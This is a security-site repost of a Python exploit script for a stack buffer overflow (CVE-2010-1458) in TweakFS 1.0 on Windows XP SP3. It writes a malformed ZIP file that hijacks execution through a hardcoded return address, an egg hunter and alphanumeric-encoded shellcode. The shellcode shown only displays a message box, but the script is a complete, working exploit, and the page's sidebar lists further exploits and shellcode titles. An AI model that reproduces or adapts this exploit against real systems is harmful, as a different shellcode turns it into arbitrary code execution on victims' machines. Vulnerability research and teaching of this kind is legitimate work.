首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
TweakFS 1.0 (FSX Edition) Stack buffer overflow
来源:http://www.corelan.be:8800 作者:corelanc0d3r 发布时间:2010-04-20  

# Exploit Title : TweakFS 1.0 (FSX Edition)
# CVE           : CVE-2010-1458
# Corelan       : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-026
# Date          : April 7th, 2010
# Author        : corelanc0d3r
# Bug found by  : TecR0c
# Software Link : http://tweakfs.com/
# Version       : 1.0
# OS            : Windows
# Tested on     : XP SP3 En (VirtualBox)
# Type of vuln  : Direct RET / SEH
# Greetz to     : Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes.
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code. 
# If you do, Corelan cannot be held responsible for any damages this may cause.
#
#
# Code :
print "|------------------------------------------------------------------|"
print "|                         __               __                      |"
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |"
print "|  / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\   / __/ _ \\/ __ `/ __ `__ \\ |"
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |"
print "| \\___/\\____/_/   \\___/_/\\__,_/_/ /_/   \\__/\\___/\\__,_/_/ /_/ /_/  |"
print "|                                                                  |"
print "|                                       http://www.corelan.be:8800 |"
print "|                                                                  |"
print "|-------------------------------------------------[ EIP Hunters ]--|\n"
print " [+] Exploit for TweakFS 1.0 - only works on XP SP3";
print " [+] Preparing payload..."
ldf_header = ("\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"\xe4\x0f"
"\x00\x00\x00")

cdf_header = ("\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\xe4\x0f"
"\x00\x00\x00\x00\x00\x00\x01\x00"
"\x24\x00\x00\x00\x00\x00\x00\x00")

eofcdf_header = ("\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00"
"\x12\x10\x00\x00"
"\x02\x10\x00\x00"
"\x00\x00")

#egg esi, will jump to edi
egg = "VYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"
egg += "avMQzjioDOW2PRqzERCh8MVNGLC51J0tJOLxpwDptpQdlKXzloaeKZnO45IwkOM7A"
getpc="\x89\x05\x5e\x98\x99\x46\x46\x8a\x94\x98\x98\x98"
getpc += "\x74\x07\x46\x46\x49\x73\x97"  #loop
getpc += "\x77\x85"  #jump before getpc
getpc += "\x46\x41\x41\x41"  #nops
nop="\x42\x42\x33\x90\x41\x41\x41\x41\x41\x41"   #nops + prepare loop
size=272

ret = "\x7C\x22\x48\x7E"  #  0x7E48227C user32.dll XP SP3
buff = "\x41" * (125-len(nop))
buff += nop + getpc + egg + "\x77\x9F"  #jmp between getpc and egg
buff += "\x41" * (size-len(buff))
buff += ret
buff += "\x41\x77\xA4\x42"   #jump back
buff += "\x3c\x44\x40\x00" # null byte to avoid writing over end of stack (no SEH)
buff += "w00tw00t"
#edi basereg - MessageBox shellcode
buff += "WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIyIHkmKzyt4utzTt"
buff += "qXRmbBZFQhIRDnkqavPLKqfdLNkrV7lNk1VwxLKSNQ0NkDvTxpOdXrUl3SiVa8QyoM1"
buff += "1pNkRLwTDdlKQUwLnksdS5d8Wq8jnkQZwhLKQJq05QjKM3egQYnkVTLK31JNUaIoVQY"
buff += "PKLNLK4O0cDfjKq8OVmUQIWyyHqKOYokOUkalgTdhSEyNnkBz5tVaJK2FNkTLPKLKrz"
buff += "GlUQZKNkUTNkUQzHnipDwTUL3QKsoBwx5yXTNixeMYhBSXNnpNVnxlbrYxOlKOkOKOK"
buff += "9qUwtMk3NxXM2rSNgWlgT2rixlKkOkOYoK9pEeXqx2LrLupYo58wC026Natph0u2SSU"
buff += "proxSlWTDJLIXfrvkORuWtoyhBRpMkMxLbrmOLMWgl14v2yxcnkOKOKOaxRlQQrnQHQ"
buff += "xBc2orrsutqKkMXQLq4uWMYKSsXprV8gPupPhpcFPsTecQxu5bLaq0nCXEpqs0oBR1x"
buff += "cTepqrRY3XPopwbNSUvQ9Yk8pLWTWeMYyqdqzrBrV3saPRyozpTqo0rpKO1EUXA"
buff += "\x43" * (4064-len(buff)) # 4064
buff += ".txt"


print " [+] Writing payload to file corelanc0d3r_tweakfs.zip"
mefile = open('corelanc0d3r_tweakfs.zip','w');
mefile.write(ldf_header + buff + cdf_header + buff + eofcdf_header);
mefile.close()
print " [+] Wrote " + str(len(buff))+ " bytes to file"


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·33 Bytes chmod("/etc/shadow",
·AVTECH Software (AVC781Viewer.
·14 Bytes execve("a->/bin/sh")
·Huawei EchoLife HG520c Denial
·Multiple Vendor AgentX++ Stack
·Huawei EchoLife HG520 Remote I
·Windows 7/2008R2 SMB Client Tr
·29 bytes chmod("/etc/shadow",
·Unauthenticated File-system Ac
·Local kernel 2.6.2x kernel pan
·Apache OFBiz FULLADMIN Creator
·Apache OFBiz SQL Remote Execut
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved